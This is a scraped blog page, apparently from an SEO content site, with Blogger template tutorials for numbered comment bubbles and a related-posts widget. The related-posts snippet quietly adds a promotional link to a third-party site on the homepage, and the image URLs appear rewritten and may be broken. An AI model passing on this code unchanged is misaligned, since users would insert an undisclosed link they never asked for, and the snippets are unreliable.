    PageSpeed takes just a few minutes to set up and requires no code changes on your site. Check out how much PageSpeed can speed up your site. I encourage you to try out these features by signing up for PageSpeed Service and letting us know what you think at page-speed-service-discuss@googlegroups.com.


    Ram Ramani is an Engineering Manager on the Make the Web Faster Team in Mountain View. He is a believer in "Faster is better".

    Posted by Scott Knaster, Editor
    2013, By: Seo Master

    seo How to number comments in Blogger/BlogSpot 2013

    Seo Master present to you: This Blogger hack will show you how to add comment count inside a speech bubble, so that you & your readers can use the numbers to mention or point to a particular comment on any of your posts and besides this, it could as well improve the look and feel of your blog.

    Note: This works with the previous blogger commenting system, so if you want to add this hack, you should remove first the Blogger threaded comments. Learn here How to remove Blogger threaded comments

    UPDATE! Now you can add comment bubble in your threaded comments too. Read this tutorial:
    How to Add Numbered Comments In Threaded Comments
    blogger blogspot, tricks

    How to add numbered comments on our Blogger/Blogspot blog
    how to blog, blogspot blogger

    Step 1. Go to Dashboard - Template - Edit HTML (click on Proceed button, if needed)


     Step 2. Select "Expand Widget Template" (make a backup)

      Step 3. Now find (CTRL+F) the following code in your template:

      <b:loop values='data:post.comments' var='comment'>

      Step 4. Immediately above/before it, paste this code:

      <script type='text/javascript'>var CommentsCounter=0;</script>

      Step 5. Find this code:

      <data:commentPostedByMsg/>

      Step 6. And immediately below/after it, copy and paste this:

      <!--comments-count-starts-->
      <span class='comments-number'>
      <a expr:href='data:comment.url' title='Comment Link'>
      <script type='text/javascript'>
      CommentsCounter=CommentsCounter+1;
      document.write(CommentsCounter)
      </script>
      </a>
      </span>
      <!--comments-count-stops-->

      Step 7. Find (CTRL+F) this tag in the template:

      </head>

      Step 8. Paste this code just above/before it:

      <!-- comments-count-starts-->
      <style type="text/css">
      .comments-number a:link, .comments-number a:visited {
      color: black !important;
      text-decoration: none !important;
      background: url(http://www.matrixar.com/-zrPssaxSG2E/T47v-XB1EWI/AAAAAAAAB8E/uUz8RiJnW2U/s1600/comment+bubble+1.png) no-repeat;
      width: 50px; /*image-width size*/
      height: 48px; /*image-height size*/
      float: right;
      display: block;
      margin-right: 5px;
      margin-top: -15px; /*comments-counter position*/
      text-align: center;
      font-family: 'Century Gothic','Lucida Grande',Arial,Helvetica,Sans-Serif;
      font-size: 15px;
      font-weight: normal;
      }
      .comments-number a:hover, .comments-number a:active {
      color: #1BA0E1 !important;
      text-decoration: none !important;
      }
      </style>
      <!-- comments-count-stops-http://www.matrixar.com-->

      Note:
      • To change the comment bubble, replace the red text from above with your own address
      • To change the color of the numbers, replace the blue text with the hex value of your color

      Comment Bubbles 

      To choose a comment bubble, right-click on the image and select "Copy Image Address/Location":


      how to blogblogger blogspotblogspot blogger, how to blogwidget blogger blogspotblogs, how to blogblogspot or blogger, how to blogtutorials, how tocomments, how to, blogspot bloggernew comment, how to blogblog design, bloggerblogger.com


      IMPORTANT: You could use any image instead of the one linked in the code above (STEP 8) but after that, you should modify the size values (width and height), so that the numbers inside the bubble to be correctly adjusted.

      Step 9. Save the template... and enjoy your comments :]

      You might also be interested in this tutorial from the same category:
      How to Add a Comment Bubble to Blogger Post Titles.


      2013, By: Seo Master

      seo How To Add Related Posts Widget With Thumbnails To Blogger 2013

      Seo Master present to you:
      Time to boost your blog page-views,here is incredible hack via which you can show the related posts to blog article below every Blog post,along with beautiful thumbnails.The data for related posts are fetched from Blog Labels and different posts.Applying this hack will help you to host your visitors with great luxury,as a result he will remain long time on your blog seeing different interesting related articles. 
      related-posts-widget-for-blogger

      How To Add Related Posts Widget With Thumbnails To Blogger


      • Go To Blogger Dashboard
      • Click On template and Then Click On edit HTML
      • Now Search for </head> Tag
      • Now Copy the below script and paste it above </head> Tag
      <!--Related Posts with thumbnails Scripts and Styles Start--> <!-- remove --><b:if cond='data:blog.pageType == &quot;item&quot;'> <style type='text/css'> #related-posts { float:center; text-transform:none; height:100%; min-height:100%; padding-top:5px; padding-left:5px; } #related-posts h2{ font-size: 18px; letter-spacing: 2px; font-weight: bold; text-transform: none; color: #5D5D5D; font-family: Arial Narrow; margin-bottom: 0.75em; margin-top: 0em; padding-top: 0em; } #related-posts a{ border-right: 1px dotted #DDDDDD; color:#5D5D5D; } #related-posts a:hover{ color:black; background-color:#EDEDEF; } </style> <script type='text/javascript'> var defaultnoimage=&quot;http://www.matrixar.com/-PpjfsStySz0/UF91FE7rxfI/AAAAAAAACl8/092MmUHSFQ0/s1600/no_image.jpg&quot;; var maxresults=4; var splittercolor=&quot;#DDDDDD&quot;; var relatedpoststitle=&quot;Related Posts&quot;; </script> <script src='http://helplogger.googlecode.com/svn/trunk/related-posts-with-big-thumbnails.js' type='text/javascript'/> <!-- remove --></b:if> <!--Related Posts with thumbnails Scripts and Styles End-->
      Note :-
      - If you want to change the Default Picture to your own or any other picture,then simply replace the Green URL With your Own image URL.
      -For Displaying more than 4 posts in the widget then change the value of 4 in the script to desired no of posts.
      -If you want to display this widget also in Home Page then remove the Blue script from the above script

      • Now Search for The below Script (Note The Below mentioned Code is 2 times in magazine style Blogger Templates so do paste the below Code after each.)
      <div class='post-footer'>

      • Now Copy the below script and paste it  above <div class='post-footer'>
      <!-- Related Posts with Thumbnails Code Start--> <!-- remove --><b:if cond='data:blog.pageType == &quot;item&quot;'> <div id='related-posts'> <b:loop values='data:post.labels' var='label'> <b:if cond='data:label.isLast != &quot;true&quot;'> </b:if> <script expr:src='&quot;/feeds/posts/default/-/&quot; + data:label.name + &quot;?alt=json-in-script&amp;callback=related_results_labels_thumbs&amp;max-results=4&quot;' type='text/javascript'/></b:loop> <script type='text/javascript'> removeRelatedDuplicates_thumbs(); printRelatedLabels_thumbs(&quot;<data:post.url/>&quot;); </script> </div><div style='clear:both'/> <!-- remove --></b:if> <b:if cond='data:blog.url == data:blog.homepageUrl'><b:if cond='data:post.isFirstPost'> <a href='http://www.matrixar.com'><img alt='Blogger Tricks' src='http://www.matrixar.com/-K65p5zLLKQk/T3ObCINoP7I/AAAAAAAABmI/dF84-alnOu4/s1600/best+blogger+tips.png'/></a> </b:if></b:if> <!-- Related Posts with Thumbnails Code End-->
      Note:-
      -For Displaying more than 4 posts in the widget then change the value of 4 in the script to desired no of posts.
      -If you want to display this widget also in Home Page then remove the Blue script from the above script.

      • Now just hit save template and that's it

      So What's Up

      Adding Related Posts Widget With Thumbnails To Blogger will help you to boost your Blog page-views,actually this post is originally written by HelpLogger,So Script Credit Goes to HelpLogger.If you have any question related this article,must pass comments.Stay Blessed,Happy Blogging.



      2013, By: Seo Master
      Powered by Blogger.